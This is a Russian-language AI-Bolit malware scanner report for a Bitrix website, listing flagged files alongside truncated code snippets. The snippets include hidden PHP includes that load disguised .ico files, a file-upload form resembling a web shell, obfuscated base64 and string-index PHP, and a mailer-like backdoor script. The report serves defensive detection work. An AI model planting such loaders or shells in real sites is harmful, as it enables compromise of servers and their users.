Отчет сканера AI-Bolit v20180830: /var/www/myvrachi/data/www/myvrachi.ru/ (1/1)
Сканер бесплатный только для личного некоммерческого использования. Информация по коммерческой лицензии (пункт №11). Авторское свидетельство о гос. регистрации в РосПатенте №2012619254 от 12 октября 2012 г.
Затрачено времени: 13 m . Сканирование начато 06-09-2018 в 14:03:09, сканирование завершено 06-09-2018 в 14:16:49
Всего проверено 45742 директорий и 28747 файлов. Использовано памяти при сканировании: 25.61 Mb.
Сводный отчет
Вредоносных скриптов12
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер минимизирует число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.

Для диагностического сканирования без ложных срабатываний мы разработали специальную версию сканера для хостинг-компаний.

Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Возможно, ваш сайт был взломан. Рекомендуем срочно проконсультироваться со специалистами по данному отчету.


Рекомендуем также проверить сайт бесплатным онлайн-сканером ReScan.Pro.


Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Наши продукты:
Критические замечания
Эти файлы могут быть вредоносными или хакерскими скриптами (12)
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
[x] 1<?php include "/var/www/myvrachi/data/www/myvrachi.ru/.git-old/objects/ce/.aa984759.ico"; echo file_get_contents('index.html.bak.bak');?
06/09/2018 13:29:33
06/09/2018 13:29:33
273 b
c1652471293e1eec66f2b6854fe7fd84485081ba
x
1536229773
id_2fc63624
[x] 1<?php  /*34d5c*/ include "/var/www/myvrachi/data/www/myvrachi.ru/.git-old/objects/ce/.
06/09/2018 13:29:33
06/09/2018 13:29:33
157 b
b81d4fc1abb1fbda627454da6133ef8ec180ed09
x
1536229773
id_5957a1fa
[x] 1<?php  /*088c8*/ include "/var/www/myvrachi/data/www/myvrachi.ru
06/09/2018 13:29:33
06/09/2018 13:29:33
222 b
861b6364b007b9b3ad6ee17aa224406666ccd010
x
1536229773
id_5957a1fa
[x] 1<?php  /*36bce*/ include "/var/www/myvrachi/data/www/myvrachi.ru/.git-old/objects/
06/09/2018 13:29:33
06/09/2018 13:29:33
170 b
fa10cb680d29bdeb839f4ff190c72c4dd37b464b
x
1536229773
id_5957a1fa
[x] 1… '<FORM ENCTYPE="multipart/form-data" ACTION="/target.php?q=11256" METHOD="POST">'. '<INPUT TYPE="hidden" name= "MAX_FILE_SIZE" value="100000">'. 'Send this file:<INPUT NAME="userfile" TYPE="file">'. '<INPUT TYP
06/09/2018 13:29:33
06/09/2018 13:29:33
6.09 Kb
d8bd27eaadd8937e9d180e0cef217d649de09791
x
1536229773
id_665f126b
[x] 1 <?echo 7457737+736723;?
06/09/2018 13:29:40
06/09/2018 13:29:40
24 b
d9eaf092ad5de2d8c310bea42247e90b9aded93b
x
1536229780
id_530fd42c
[x] 1<? $GLOBALS['_____1070006662']=array('IncludeModuleLangFile','GetModuleEvents','ExecuteModuleEventEx');?><?$GLOBALS['____4
06/09/2018 13:29:47
06/09/2018 13:29:47
251.89 Kb
d7e13a5fe1acb9e8cc868d5b7d6f36c917874fea
x
1536229787
id_93e67a24
[x] 1…ERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/ajax_tools.php"); /*ZDUyZmZMGRkYjNhNDZkOWEzMzcxN2Q1ZjMyNDVmOWEwNDgxYTU=*/ $GLOBALS['____1489266786']=array(base64_decode('ZGVmaW5l'));;function___80749819($_624743452){static$_131067765=fa
06/09/2018 13:29:45
06/09/2018 13:29:45
22.90 Kb
e442e1718c9cdc1a03a26538fec3215be925bb55
x
1536229785
id_93e67a24
[x] 1…ERVER['REMOTE_ADDR'];while($key=key($_SERVER)){if($_SERVER[$key]==$compare){$_SERVER[$key]=$randString;}next($_SERVER);} if(isset($_POST['ch'])===true){Check();exit;}if(isset($_POST['sn'])===true){Send();exit;}function Send(){$replyto=urlde
06/09/2018 13:29:57
06/09/2018 13:29:57
11.65 Kb
1b2ca05161ba06313eab112214d8787e991145f5
x
1536229797
id_b3670cb1
[x] 1<?php  $HU7528="m)b3goykaq2n8cwj6x07hiz;.e4f*/5_vs9dr1(ptul";$MaZ9553=$HU7528[39].$HU7528[36].$HU7528[25].$HU7528[4].$HU7528[3
06/09/2018 13:30:07
06/09/2018 13:30:07
24.64 Kb
63fb8b0d8f5368b59be995fdd18972a9b335c32c
x
1536229807
id_c17dcace
[x] 1 <?php $raPo_rZluoE=base64_decode("YmFzZTY0X2RlY2'.
06/09/2018 13:30:07
06/09/2018 13:30:07
723 b
6cb9e2dbf6e6f109a6527b854759dac1b71a8326
x
1536229807
id_3dde3652
[x] 1 <?echo 7457737+736723;?
06/09/2018 13:30:07
06/09/2018 13:30:07
24 b
d9eaf092ad5de2d8c310bea42247e90b9aded93b
x
1536229807
id_530fd42c
Предупреждения
Дорвеи, реклама, спам-ссылки, редиректы
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
1…TEXT_TYPE"]=="file"):?><iframe width="100%" height="95%" src="<?php echo$arResult["LESSON"]["LAUNCH"]?>" frameborder="0" ></iframe><?php else:?><?if($arResult["LESSON"]["SELF_TEST_EXISTS"]):?><a href="<?=$arResult["LESSON"]["SELF_TEST_URL"]
06/09/2018 13:29:36
06/09/2018 13:29:36
1.25 Kb
cae23aa3aedb20cb28b22f97a0f009e955384663
x
1536229776
id_z5679116
1…["DETAIL_TEXT_TYPE"]=="file"):?><iframe width="100%" height="500" src="<?php echo$arElement["LAUNCH"]?>" frameborder="0" ></iframe><?php else:?><?=$arElement["DETAIL_TEXT"]?><?php endif?><div class="page-break"></div><?endforeach;?></div><?
06/09/2018 13:29:41
06/09/2018 13:29:41
1.69 Kb
a980c8c883d17327a5cc950cbd9b3671597c9b22
x
1536229781
id_z8701993
1…log_admin_before.php");if(!$USER->CanDoOperation('edit_php')){$APPLICATION->AuthForm(GetMessage("ACCESS_DENIED"));}else{ phpinfo();}?
06/09/2018 13:29:47
06/09/2018 13:29:47
204 b
3de4d48a050d233c344ad5b4be60ef4f15d4498f
x
1536229787
id_z8544615
1…["DETAIL_TEXT_TYPE"]=="file"):?><iframe width="100%" height="500" src="<?php echo$arElement["LAUNCH"]?>" frameborder="0" ></iframe><?php else:?><?=$arElement["DETAIL_TEXT"]?><?php endif?><div class="page-break"></div><?endforeach;?></div><?
06/09/2018 13:29:56
06/09/2018 13:29:56
1.71 Kb
d0cf83c6939e53bec7f4fb08fef31fe9e8ce7ef2
x
1536229796
id_z2712505
1…H.DIR_SEPARATOR.REPORT_FILE)){unlink(REPORT_PATH.DIR_SEPARATOR.REPORT_FILE);}}if(function_exists('phpinfo')){ob_start(); phpinfo();$l_PhpInfo=ob_get_contents();ob_end_clean();$l_PhpInfo=str_replace('border: 1px','',$l_PhpInfo);preg_match('|
06/09/2018 13:29:48
06/09/2018 13:29:48
385.60 Kb
dab77f5c3e9a1a50c778b189d5dbee5fecf4459e
x
1536229788
id_z3380549
Подозрение на дорвей
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
-
-
-
x
id_z6795024
-
-
-
x
id_z4779426
-
-
-
x
id_z2254833
-
-
-
x
id_z6313388
-
-
-
x
id_z4151657
-
-
-
x
id_z4076168
-
-
-
x
id_z1609824
-
-
-
x
id_z2202382
-
-
-
x
id_z2926405
-
-
-
x
id_z1980914
Версии найденных CMS
Bitrix v16.5.16